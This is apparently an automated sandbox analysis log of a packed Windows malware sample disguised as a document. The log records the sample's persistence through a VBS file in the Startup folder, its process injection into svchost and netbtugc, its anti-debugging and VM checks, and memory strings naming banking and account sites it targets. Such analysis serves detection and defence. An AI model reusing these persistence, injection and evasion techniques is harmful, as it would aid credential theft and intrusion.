00000008.00000002.2234431082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2228385577.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2224307956.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2022470465.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2026449015.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.2167849289.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2077285315.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2167849289.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2074987804.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2171018368.0000000003208000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.00000000033B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.000000000354E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2167126471.0000000003056000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000007.00000003.2163353452.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000007.00000003.2162748029.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2234431082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2234431082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2228385577.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2224307956.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000003.00000002.2167710865.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2135727420.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477269570.0000000000E08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.4478683134.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4476837746.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2468447936.00000000139FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.4478683134.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4476837746.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2468447936.00000000139FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000003.00000002.2167710865.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2135727420.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477269570.0000000000E08000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_009090A0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_009090A0

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007DC590 push eax; retn 007Dh	0_2_007DC599
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F8B85 push ecx; ret	0_2_007F8B98
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085F84D pushfd ; iretd	0_2_0085F84E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004048A9 push esp; ret	3_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E2BA push 00000038h; iretd	3_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A436 push ebx; iretd	3_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00418C92 pushad ; retf	3_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A5D9 push ebx; iretd	3_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004017E5 push ebp; retf 003Fh	3_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00403780 push eax; ret	3_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004147A2 push es; iretd	3_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0340225F pushad ; ret	3_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034027FA pushad ; ret	3_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034309AD push ecx; mov dword ptr [esp], ecx	3_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0340283D push eax; iretd	3_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0340135E push eax; iretd	3_2_03401369
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02ED2A34 push FFFFFFBAh; ret	4_2_02ED2A36
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EC804E pushad ; retf	4_2_02EC804F
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EC79E8 push ebx; ret	4_2_02EC79E9
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EC9995 push ebx; iretd	4_2_02EC99BC
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02ECD676 push 00000038h; iretd	4_2_02ECD67A
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EC97F2 push ebx; iretd	4_2_02EC99BC
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EB3C65 push esp; ret	4_2_02EB3C66

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\Document TOP19928.exe

File created: C:\Users\user\AppData\Local\directory\name.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_007D4A35
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_008555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_008555FD

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007F33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_007F33C7

Source: C:\Users\user\Desktop\Document TOP19928.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\directory\name.exe	API/Special instruction interceptor: Address: 3A53254
Source: C:\Users\user\AppData\Local\directory\name.exe	API/Special instruction interceptor: Address: 1123254
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0347096E rdtsc

3_2_0347096E

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9838

Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-100541

Source: C:\Users\user\Desktop\Document TOP19928.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1576	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1576	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1576	Thread sleep count: 9838 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1576	Thread sleep time: -19676000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe TID: 5776	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe TID: 5776	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe TID: 5776	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe TID: 5776	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe TID: 5776	Thread sleep time: -49000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00834696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00834696
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0083C9C7
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083C93C FindFirstFileW,FindClose,	0_2_0083C93C
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0083F200
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0083F35D
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0083F65E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00833A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00833A2B
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00833D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00833D4E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0083BF27

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007D4AFE

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: F56GKLK7U4.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: offer_merchant_domainctivebrokers.co.inVMware20
Source: F56GKLK7U4.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware2
Source: F56GKLK7U4.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: F56GKLK7U4.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: wscript.exe, 00000006.00000002.2155898243.0000021315885000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X
Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,111
Source: F56GKLK7U4.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: F56GKLK7U4.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: F56GKLK7U4.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116
Source: F56GKLK7U4.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4477268151.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2469599968.00000192539DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ctivebrokers.co.inVMware20
Source: F56GKLK7U4.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: wscript.exe, 00000006.00000002.2155898243.0000021315885000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
Source: F56GKLK7U4.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware
Source: F56GKLK7U4.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: F56GKLK7U4.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: F56GKLK7U4.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: F56GKLK7U4.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: netbtugc.exe, 00000005.00000002.4480335439.0000000007C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696428655o
Source: F56GKLK7U4.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: F56GKLK7U4.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: F56GKLK7U4.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\Document TOP19928.exe	API call chain: ExitProcess graph end node			graph_0-98700
Source: C:\Users\user\Desktop\Document TOP19928.exe	API call chain: ExitProcess graph end node			graph_0-98545

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0347096E rdtsc

3_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_00417823 LdrLoadDll,

3_2_00417823

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_008441FD BlockInput,

0_2_008441FD

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_007D3B4C

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_00805CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

0_2_00805CCC

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_009090A0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_009090A0

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00EE34C0 mov eax, dword ptr fs:[00000030h]	0_2_00EE34C0
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00EE3520 mov eax, dword ptr fs:[00000030h]	0_2_00EE3520
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00EE1E70 mov eax, dword ptr fs:[00000030h]	0_2_00EE1E70
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_03A53520 mov eax, dword ptr fs:[00000030h]	2_2_03A53520
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_03A51E70 mov eax, dword ptr fs:[00000030h]	2_2_03A51E70
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_03A534C0 mov eax, dword ptr fs:[00000030h]	2_2_03A534C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]	3_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]	3_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]	3_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]	3_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B035C mov ecx, dword ptr fs:[00000030h]	3_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]	3_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]	3_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FA352 mov eax, dword ptr fs:[00000030h]	3_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D8350 mov ecx, dword ptr fs:[00000030h]	3_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D437C mov eax, dword ptr fs:[00000030h]	3_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]	3_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]	3_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]	3_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342C310 mov ecx, dword ptr fs:[00000030h]	3_2_0342C310
